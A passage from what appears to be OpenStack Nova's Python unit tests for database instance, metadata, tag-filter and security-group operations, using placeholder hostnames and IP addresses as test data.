updated_group = db.security_group_update(self.ctxt,
security_group['id'],
new_values,
columns_to_join=['rules.grantee_group'])
for key, value in new_values.iteritems():
self.assertEqual(updated_group[key], value)
self.assertEqual(updated_group['rules'], [])
def test_security_group_update_to_duplicate(self):
self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj1'})
security_group2 = self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj2'})
self.assertRaises(exception.SecurityGroupExists,
db.security_group_update,
self.ctxt, security_group2['id'],
{'project_id': 'fake_proj1'})


class InstanceTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.instance_* methods."""
sample_data = {
'project_id': 'project1',
'hostname': 'example.com',
'host': 'h1',
'node': 'n1',
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'ckey': 'cvalue'},
}
def setUp(self):
super(InstanceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _assertEqualInstances(self, instance1, instance2):
self._assertEqualObjects(instance1, instance2,
ignored_keys=['metadata', 'system_metadata', 'info_cache',
'extra'])
def _assertEqualListsOfInstances(self, list1, list2):
self._assertEqualListsOfObjects(list1, list2,
ignored_keys=['metadata', 'system_metadata', 'info_cache',
'extra'])
def create_instance_with_args(self, **kwargs):
if 'context' in kwargs:
context = kwargs.pop('context')
else:
context = self.ctxt
args = self.sample_data.copy()
args.update(kwargs)
return db.instance_create(context, args)
def test_instance_create(self):
instance = self.create_instance_with_args()
self.assertTrue(uuidutils.is_uuid_like(instance['uuid']))
def test_instance_create_with_object_values(self):
values = {
'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1'),
}
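        # IPAddress objects and tz-aware datetimes should come back as plain
        # strings and naive datetimes.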
dt_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at', 'scheduled_at')
dt = timeutils.utcnow()
dt_utc = dt.replace(tzinfo=iso8601.iso8601.Utc())
for key in dt_keys:
values[key] = dt_utc
inst = db.instance_create(self.ctxt, values)
self.assertEqual(inst['access_ip_v4'], '1.2.3.4')
self.assertEqual(inst['access_ip_v6'], '::1')
for key in dt_keys:
self.assertEqual(inst[key], dt)
def test_instance_update_with_object_values(self):
values = {
'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1'),
}
dt_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at', 'scheduled_at')
dt = timeutils.utcnow()
dt_utc = dt.replace(tzinfo=iso8601.iso8601.Utc())
for key in dt_keys:
values[key] = dt_utc
inst = db.instance_create(self.ctxt, {})
inst = db.instance_update(self.ctxt, inst['uuid'], values)
self.assertEqual(inst['access_ip_v4'], '1.2.3.4')
self.assertEqual(inst['access_ip_v6'], '::1')
for key in dt_keys:
self.assertEqual(inst[key], dt)
def test_instance_update_no_metadata_clobber(self):
meta = {'foo': 'bar'}
sys_meta = {'sfoo': 'sbar'}
values = {
'metadata': meta,
'system_metadata': sys_meta,
}
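        # instance_update must not mutate the metadata dicts passed in by
        # the caller.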
inst = db.instance_create(self.ctxt, {})
inst = db.instance_update(self.ctxt, inst['uuid'], values)
self.assertEqual({'foo': 'bar'}, meta)
self.assertEqual({'sfoo': 'sbar'}, sys_meta)
def test_instance_get_all_with_meta(self):
inst = self.create_instance_with_args()
for inst in db.instance_get_all(self.ctxt):
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_update(self):
instance = self.create_instance_with_args()
metadata = {'host': 'bar', 'key2': 'wuff'}
system_metadata = {'original_image_ref': 'baz'}
# Update the metadata
db.instance_update(self.ctxt, instance['uuid'], {'metadata': metadata,
'system_metadata': system_metadata})
# Retrieve the user-provided metadata to ensure it was successfully
# updated
self.assertEqual(metadata,
db.instance_metadata_get(self.ctxt, instance['uuid']))
self.assertEqual(system_metadata,
db.instance_system_metadata_get(self.ctxt, instance['uuid']))
def test_instance_update_bad_str_dates(self):
instance = self.create_instance_with_args()
values = {'created_at': '123'}
self.assertRaises(ValueError,
db.instance_update,
self.ctxt, instance['uuid'], values)
def test_instance_update_good_str_dates(self):
instance = self.create_instance_with_args()
values = {'created_at': '2011-01-31T00:00:00.0'}
actual = db.instance_update(self.ctxt, instance['uuid'], values)
expected = datetime.datetime(2011, 1, 31)
self.assertEqual(expected, actual["created_at"])
def test_create_instance_unique_hostname(self):
context1 = context.RequestContext('user1', 'p1')
context2 = context.RequestContext('user2', 'p2')
self.create_instance_with_args(hostname='h1', project_id='p1')
# With scope 'global' any duplicate should fail, be it this project:
self.flags(osapi_compute_unique_server_name_scope='global')
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context1,
hostname='h1', project_id='p3')
# or another:
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context2,
hostname='h1', project_id='p2')
# With scope 'project' a duplicate in the project should fail:
self.flags(osapi_compute_unique_server_name_scope='project')
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context1,
hostname='h1', project_id='p1')
# With scope 'project' a duplicate in a different project should work:
self.flags(osapi_compute_unique_server_name_scope='project')
self.create_instance_with_args(context=context2, hostname='h2')
self.flags(osapi_compute_unique_server_name_scope=None)
@mock.patch('nova.db.sqlalchemy.api.undefer')
@mock.patch('nova.db.sqlalchemy.api.joinedload')
def test_instance_get_all_by_filters_extra_columns(self,
mock_joinedload,
mock_undefer):
db.instance_get_all_by_filters_sort(
self.ctxt, {},
columns_to_join=['info_cache', 'extra.pci_requests'])
mock_joinedload.assert_called_once_with('info_cache')
mock_undefer.assert_called_once_with('extra.pci_requests')
@mock.patch('nova.db.sqlalchemy.api.undefer')
@mock.patch('nova.db.sqlalchemy.api.joinedload')
def test_instance_get_active_by_window_extra_columns(self,
mock_joinedload,
mock_undefer):
now = datetime.datetime(2013, 10, 10, 17, 16, 37, 156701)
db.instance_get_active_by_window_joined(
self.ctxt, now,
columns_to_join=['info_cache', 'extra.pci_requests'])
mock_joinedload.assert_called_once_with('info_cache')
mock_undefer.assert_called_once_with('extra.pci_requests')
def test_instance_get_all_by_filters_with_meta(self):
inst = self.create_instance_with_args()
for inst in db.instance_get_all_by_filters(self.ctxt, {}):
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_get_all_by_filters_without_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt, {},
columns_to_join=[])
for inst in result:
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_all_by_filters(self):
instances = [self.create_instance_with_args() for i in range(3)]
filtered_instances = db.instance_get_all_by_filters(self.ctxt, {})
self._assertEqualListsOfInstances(instances, filtered_instances)
def test_instance_get_all_by_filters_zero_limit(self):
self.create_instance_with_args()
instances = db.instance_get_all_by_filters(self.ctxt, {}, limit=0)
self.assertEqual([], instances)
def test_instance_metadata_get_multi(self):
uuids = [self.create_instance_with_args()['uuid'] for i in range(3)]
meta = sqlalchemy_api._instance_metadata_get_multi(self.ctxt, uuids)
for row in meta:
self.assertIn(row['instance_uuid'], uuids)
def test_instance_metadata_get_multi_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
sqlalchemy_api._instance_metadata_get_multi(self.ctxt, [])
def test_instance_system_system_metadata_get_multi(self):
uuids = [self.create_instance_with_args()['uuid'] for i in range(3)]
sys_meta = sqlalchemy_api._instance_system_metadata_get_multi(
self.ctxt, uuids)
for row in sys_meta:
self.assertIn(row['instance_uuid'], uuids)
def test_instance_system_metadata_get_multi_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
sqlalchemy_api._instance_system_metadata_get_multi(self.ctxt, [])
def test_instance_get_all_by_filters_regex(self):
i1 = self.create_instance_with_args(display_name='test1')
i2 = self.create_instance_with_args(display_name='teeeest2')
self.create_instance_with_args(display_name='diff')
result = db.instance_get_all_by_filters(self.ctxt,
{'display_name': 't.*st.'})
self._assertEqualListsOfInstances(result, [i1, i2])
def test_instance_get_all_by_filters_changes_since(self):
        i1 = self.create_instance_with_args(
            updated_at='2013-12-05T15:03:25.000000')
        i2 = self.create_instance_with_args(
            updated_at='2013-12-05T15:03:26.000000')
changes_since = iso8601.parse_date('2013-12-05T15:03:25.000000')
result = db.instance_get_all_by_filters(self.ctxt,
{'changes-since':
changes_since})
self._assertEqualListsOfInstances([i1, i2], result)
changes_since = iso8601.parse_date('2013-12-05T15:03:26.000000')
result = db.instance_get_all_by_filters(self.ctxt,
{'changes-since':
changes_since})
self._assertEqualListsOfInstances([i2], result)
def test_instance_get_all_by_filters_exact_match(self):
instance = self.create_instance_with_args(host='host1')
self.create_instance_with_args(host='host12')
result = db.instance_get_all_by_filters(self.ctxt,
{'host': 'host1'})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_metadata(self):
instance = self.create_instance_with_args(metadata={'foo': 'bar'})
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt,
{'metadata': {'foo': 'bar'}})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_system_metadata(self):
instance = self.create_instance_with_args(
system_metadata={'foo': 'bar'})
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_unicode_value(self):
instance = self.create_instance_with_args(display_name=u'test♥')
result = db.instance_get_all_by_filters(self.ctxt,
{'display_name': u'test'})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_tags(self):
instance = self.create_instance_with_args(
metadata={'foo': 'bar'})
self.create_instance_with_args()
# For format 'tag-'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-key', 'value': 'foo'},
{'name': 'tag-value', 'value': 'bar'},
]})
self._assertEqualListsOfInstances([instance], result)
# For format 'tag:'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'bar'},
]})
self._assertEqualListsOfInstances([instance], result)
# For non-existent tag
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'barred'},
]})
self.assertEqual([], result)
# Confirm with deleted tags
db.instance_metadata_delete(self.ctxt, instance['uuid'], 'foo')
# For format 'tag-'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-key', 'value': 'foo'},
]})
self.assertEqual([], result)
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-value', 'value': 'bar'}
]})
self.assertEqual([], result)
# For format 'tag:'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'bar'},
]})
self.assertEqual([], result)
def test_instance_get_by_uuid(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'])
self._assertEqualInstances(inst, result)
def test_instance_get_by_uuid_join_empty(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=[])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_by_uuid_join_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=['metadata'])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_by_uuid_join_sys_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=['system_metadata'])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_get_all_by_filters_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(reservation_id='b')
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt, {})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['metadata', 'system_metadata',
'deleted', 'deleted_at', 'info_cache',
'pci_devices', 'extra'])
def test_instance_get_all_by_filters_deleted_and_soft_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': True})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['metadata', 'system_metadata',
'deleted', 'deleted_at', 'info_cache',
'pci_devices', 'extra'])
def test_instance_get_all_by_filters_deleted_no_soft_deleted(self):
inst1 = self.create_instance_with_args()
self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': True,
'soft_deleted': False})
self._assertEqualListsOfObjects([inst1], result,
ignored_keys=['deleted', 'deleted_at', 'metadata',
'system_metadata', 'info_cache', 'pci_devices',
'extra'])
def test_instance_get_all_by_filters_alive_and_soft_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
inst3 = self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': False,
'soft_deleted': True})
self._assertEqualListsOfInstances([inst2, inst3], result)
def test_instance_get_all_by_filters_not_deleted(self):
inst1 = self.create_instance_with_args()
self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
inst3 = self.create_instance_with_args()
inst4 = self.create_instance_with_args(vm_state=vm_states.ACTIVE)
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': False})
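        # inst3 never had vm_state set; it must still be returned as a
        # non-deleted instance.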
self.assertIsNone(inst3.vm_state)
self._assertEqualListsOfInstances([inst3, inst4], result)
def test_instance_get_all_by_filters_cleaned(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(reservation_id='b')
db.instance_update(self.ctxt, inst1['uuid'], {'cleaned': 1})
result = db.instance_get_all_by_filters(self.ctxt, {})
self.assertEqual(2, len(result))
self.assertIn(inst1['uuid'], [result[0]['uuid'], result[1]['uuid']])
self.assertIn(inst2['uuid'], [result[0]['uuid'], result[1]['uuid']])
if inst1['uuid'] == result[0]['uuid']:
self.assertTrue(result[0]['cleaned'])
self.assertFalse(result[1]['cleaned'])
else:
self.assertTrue(result[1]['cleaned'])
self.assertFalse(result[0]['cleaned'])
def test_instance_get_all_by_filters_tag_any(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2, t3])
db.instance_tag_set(self.ctxt, inst3.uuid, [t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag-any': [t1, t2]})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_filters_tag_any_empty(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
t4 = 'tag4'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag-any': [t3, t4]})
self.assertEqual([], result)
def test_instance_get_all_by_filters_tag(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1, t3])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
db.instance_tag_set(self.ctxt, inst3.uuid, [t1, t2, t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t1, t2]})
self._assertEqualListsOfObjects([inst2, inst3], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_filters_tag_empty(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t3]})
self.assertEqual([], result)
def test_instance_get_all_by_filters_tag_any_and_tag(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
t4 = 'tag4'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1, t2])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2, t4])
db.instance_tag_set(self.ctxt, inst3.uuid, [t2, t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t1, t2],
'tag-any': [t3, t4]})
self._assertEqualListsOfObjects([inst2], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_host_and_node_no_join(self):
instance = self.create_instance_with_args()
result = db.instance_get_all_by_host_and_node(self.ctxt, 'h1', 'n1')
self.assertEqual(result[0]['uuid'], instance['uuid'])
self.assertEqual(result[0]['system_metadata'], [])
def test_instance_get_all_by_host_and_node(self):
instance = self.create_instance_with_args(
system_metadata={'foo': 'bar'})
result = db.instance_get_all_by_host_and_node(
self.ctxt, 'h1', 'n1',
columns_to_join=['system_metadata', 'extra'])
self.assertEqual(instance['uuid'], result[0]['uuid'])
self.assertEqual('bar', result[0]['system_metadata'][0]['value'])
self.assertEqual(instance['uuid'], result[0]['extra']['instance_uuid'])
@mock.patch('nova.db.sqlalchemy.api._instances_fill_metadata')
@mock.patch('nova.db.sqlalchemy.api._instance_get_all_query')
def test_instance_get_all_by_host_and_node_fills_manually(self,
mock_getall,
mock_fill):
db.instance_get_all_by_host_and_node(
self.ctxt, 'h1', 'n1',
columns_to_join=['metadata', 'system_metadata', 'extra', 'foo'])
self.assertEqual(sorted(['extra', 'foo']),
sorted(mock_getall.call_args[1]['joins']))
self.assertEqual(sorted(['metadata', 'system_metadata']),
sorted(mock_fill.call_args[1]['manual_joins']))
def test_instance_get_all_hung_in_rebooting(self):
# Ensure no instances are returned.
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self.assertEqual([], results)
# Ensure one rebooting instance with updated_at older than 10 seconds
# is returned.
instance = self.create_instance_with_args(task_state="rebooting",
updated_at=datetime.datetime(2000, 1, 1, 12, 0, 0))
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self._assertEqualListsOfObjects([instance], results,
ignored_keys=['task_state', 'info_cache', 'security_groups',
'metadata', 'system_metadata', 'pci_devices',
'extra'])
db.instance_update(self.ctxt, instance['uuid'], {"task_state": None})
# Ensure the newly rebooted instance is not returned.
instance = self.create_instance_with_args(task_state="rebooting",
updated_at=timeutils.utcnow())
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self.assertEqual([], results)
def test_instance_update_with_expected_vm_state(self):
instance = self.create_instance_with_args(vm_state='foo')
db.instance_update(self.ctxt, instance['uuid'], {'host': 'h1',
'expected_vm_state': ('foo', 'bar')})
def test_instance_update_with_unexpected_vm_state(self):
instance = self.create_instance_with_args(vm_state='foo')
self.assertRaises(exception.UnexpectedVMStateError,
db.instance_update, self.ctxt, instance['uuid'],
{'host': 'h1', 'expected_vm_state': ('spam', 'bar')})
def test_instance_update_with_instance_uuid(self):
        # Ensure instance_update() works when an instance UUID is passed.
ctxt = context.get_admin_context()
# Create an instance with some metadata
values = {'metadata': {'host': 'foo', 'key1': 'meow'},
'system_metadata': {'original_image_ref': 'blah'}}
instance = db.instance_create(ctxt, values)
# Update the metadata
values = {'metadata': {'host': 'bar', 'key2': 'wuff'},
'system_metadata': {'original_image_ref': 'baz'}}
db.instance_update(ctxt, instance['uuid'], values)
# Retrieve the user-provided metadata to ensure it was successfully
# updated
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
self.assertEqual('bar', instance_meta['host'])
self.assertEqual('wuff', instance_meta['key2'])
self.assertNotIn('key1', instance_meta)
# Retrieve the system metadata to ensure it was successfully updated
system_meta = db.instance_system_metadata_get(ctxt, instance['uuid'])
self.assertEqual('baz', system_meta['original_image_ref'])
def test_delete_instance_metadata_on_instance_destroy(self):
ctxt = context.get_admin_context()
# Create an instance with some metadata
values = {'metadata': {'host': 'foo', 'key1': 'meow'},
'system_metadata': {'original_image_ref': 'blah'}}
instance = db.instance_create(ctxt, values)
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
self.assertEqual('foo', instance_meta['host'])
self.assertEqual('meow', instance_meta['key1'])
db.instance_destroy(ctxt, instance['uuid'])
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
# Make sure instance metadata is deleted as well
self.assertEqual({}, instance_meta)
def test_delete_instance_faults_on_instance_destroy(self):
ctxt = context.get_admin_context()
uuid = str(stdlib_uuid.uuid4())
# Create faults
db.instance_create(ctxt, {'uuid': uuid})
fault_values = {
'message': 'message',
'details': 'detail',
'instance_uuid': uuid,
'code': 404,
'host': 'localhost'
}
fault = db.instance_fault_create(ctxt, fault_values)
# Retrieve the fault to ensure it was successfully added
faults = db.instance_fault_get_by_instance_uuids(ctxt, [uuid])
self.assertEqual(1, len(faults[uuid]))
self._assertEqualObjects(fault, faults[uuid][0])
db.instance_destroy(ctxt, uuid)
faults = db.instance_fault_get_by_instance_uuids(ctxt, [uuid])
        # Make sure instance faults are deleted as well
self.assertEqual(0, len(faults[uuid]))
def test_instance_update_with_and_get_original(self):
instance = self.create_instance_with_args(vm_state='building')
(old_ref, new_ref) = db.instance_update_and_get_original(self.ctxt,
instance['uuid'], {'vm_state': 'needscoffee'})
self.assertEqual('building', old_ref['vm_state'])
self.assertEqual('needscoffee', new_ref['vm_state'])
def test_instance_update_and_get_original_metadata(self):
instance = self.create_instance_with_args()
columns_to_join = ['metadata']
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'vm_state': 'needscoffee'},
columns_to_join=columns_to_join)
meta = utils.metadata_to_dict(new_ref['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(new_ref['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_update_and_get_original_metadata_none_join(self):
instance = self.create_instance_with_args()
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'metadata': {'mk1': 'mv3'}})
meta = utils.metadata_to_dict(new_ref['metadata'])
self.assertEqual(meta, {'mk1': 'mv3'})
def test_instance_update_and_get_original_no_conflict_on_session(self):
session = get_session()
# patch get_session so that we may inspect it outside of the
# method; once enginefacade is implemented, this can be simplified
with mock.patch("nova.db.sqlalchemy.api.get_session", lambda: session):
instance = self.create_instance_with_args()
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'metadata': {'mk1': 'mv3'}})
# test some regular persisted fields
self.assertEqual(old_ref.uuid, new_ref.uuid)
self.assertEqual(old_ref.project_id, new_ref.project_id)
# after a copy operation, we can assert:
# 1. the two states have their own InstanceState
old_insp = inspect(old_ref)
new_insp = inspect(new_ref)
self.assertNotEqual(old_insp, new_insp)
# 2. only one of the objects is still in our Session
self.assertIs(new_insp.session, session)
self.assertIsNone(old_insp.session)
# 3. The "new" object remains persistent and ready
# for updates
self.assertTrue(new_insp.persistent)
# 4. the "old" object is detached from this Session.
self.assertTrue(old_insp.detached)
def test_instance_update_unique_name(self):
context1 = context.RequestContext('user1', 'p1')
context2 = context.RequestContext('user2', 'p2')
inst1 = self.create_instance_with_args(context=context1,
project_id='p1',
hostname='fake_name1')
inst2 = self.create_instance_with_args(context=context1,
project_id='p1',
hostname='fake_name2')
inst3 = self.create_instance_with_args(context=context2,
project_id='p2',
hostname='fake_name3')
# osapi_compute_unique_server_name_scope is unset so this should work:
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_name2'})
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_name1'})
# With scope 'global' any duplicate should fail.
self.flags(osapi_compute_unique_server_name_scope='global')
self.assertRaises(exception.InstanceExists,
db.instance_update,
context1,
inst2['uuid'],
{'hostname': 'fake_name1'})
self.assertRaises(exception.InstanceExists,
db.instance_update,
context2,
inst3['uuid'],
{'hostname': 'fake_name1'})
# But we should definitely be able to update our name if we aren't
# really changing it.
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_NAME'})
# With scope 'project' a duplicate in the project should fail:
self.flags(osapi_compute_unique_server_name_scope='project')
self.assertRaises(exception.InstanceExists, db.instance_update,
context1, inst2['uuid'], {'hostname': 'fake_NAME'})
# With scope 'project' a duplicate in a different project should work:
self.flags(osapi_compute_unique_server_name_scope='project')
db.instance_update(context2, inst3['uuid'], {'hostname': 'fake_NAME'})
def _test_instance_update_updates_metadata(self, metadata_type):
instance = self.create_instance_with_args()
def set_and_check(meta):
inst = db.instance_update(self.ctxt, instance['uuid'],
{metadata_type: dict(meta)})
_meta = utils.metadata_to_dict(inst[metadata_type])
self.assertEqual(meta, _meta)
meta = {'speed': '88', 'units': 'MPH'}
set_and_check(meta)
meta['gigawatts'] = '1.21'
set_and_check(meta)
del meta['gigawatts']
set_and_check(meta)
def test_security_group_in_use(self):
db.instance_create(self.ctxt, dict(host='foo'))
def test_instance_update_updates_system_metadata(self):
# Ensure that system_metadata is updated during instance_update
self._test_instance_update_updates_metadata('system_metadata')
def test_instance_update_updates_metadata(self):
# Ensure that metadata is updated during instance_update
self._test_instance_update_updates_metadata('metadata')
def test_instance_floating_address_get_all(self):
ctxt = context.get_admin_context()
instance1 = db.instance_create(ctxt, {'host': 'h1', 'hostname': 'n1'})
instance2 = db.instance_create(ctxt, {'host': 'h2', 'hostname': 'n2'})
fixed_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_addresses = ['2.1.1.1', '2.1.1.2', '2.1.1.3']
instance_uuids = [instance1['uuid'], instance1['uuid'],
instance2['uuid']]
for fixed_addr, float_addr, instance_uuid in zip(fixed_addresses,
float_addresses,
instance_uuids):
db.fixed_ip_create(ctxt, {'address': fixed_addr,
'instance_uuid': instance_uuid})
fixed_id = db.fixed_ip_get_by_address(ctxt, fixed_addr)['id']
db.floating_ip_create(ctxt,
{'address': float_addr,
'fixed_ip_id': fixed_id})
real_float_addresses = \
db.instance_floating_address_get_all(ctxt, instance_uuids[0])
self.assertEqual(set(float_addresses[:2]), set(real_float_addresses))
real_float_addresses = \
db.instance_floating_address_get_all(ctxt, instance_uuids[2])
self.assertEqual(set([float_addresses[2]]), set(real_float_addresses))
self.assertRaises(exception.InvalidUUID,
db.instance_floating_address_get_all,
ctxt, 'invalid_uuid')
def test_instance_stringified_ips(self):
instance = self.create_instance_with_args()
instance = db.instance_update(
self.ctxt, instance['uuid'],
{'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1')})
self.assertIsInstance(instance['access_ip_v4'], six.string_types)
self.assertIsInstance(instance['access_ip_v6'], six.string_types)
instance = db.instance_get_by_uuid(self.ctxt, instance['uuid'])
self.assertIsInstance(instance['access_ip_v4'], six.string_types)
self.assertIsInstance(instance['access_ip_v6'], six.string_types)
def test_instance_destroy(self):
ctxt = context.get_admin_context()
values = {
'metadata': {'key': 'value'}
}
inst_uuid = self.create_instance_with_args(**values)['uuid']
db.instance_destroy(ctxt, inst_uuid)
self.assertRaises(exception.InstanceNotFound,
db.instance_get, ctxt, inst_uuid)
self.assertIsNone(db.instance_info_cache_get(ctxt, inst_uuid))
self.assertEqual({}, db.instance_metadata_get(ctxt, inst_uuid))
def test_instance_destroy_already_destroyed(self):
ctxt = context.get_admin_context()
instance = self.create_instance_with_args()
db.instance_destroy(ctxt, instance['uuid'])
self.assertRaises(exception.InstanceNotFound,
db.instance_destroy, ctxt, instance['uuid'])
class InstanceMetadataTestCase(test.TestCase):
"""Tests for db.api.instance_metadata_* methods."""
def setUp(self):
super(InstanceMetadataTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_instance_metadata_get(self):
instance = db.instance_create(self.ctxt, {'metadata':
{'key': 'value'}})
self.assertEqual({'key': 'value'}, db.instance_metadata_get(
self.ctxt, instance['uuid']))
def test_instance_metadata_delete(self):
instance = db.instance_create(self.ctxt,
{'metadata': {'key': 'val',
'key1': 'val1'}})
db.instance_metadata_delete(self.ctxt, instance['uuid'], 'key1')
self.assertEqual({'key': 'val'}, db.instance_metadata_get(
self.ctxt, instance['uuid']))
def test_instance_metadata_update(self):
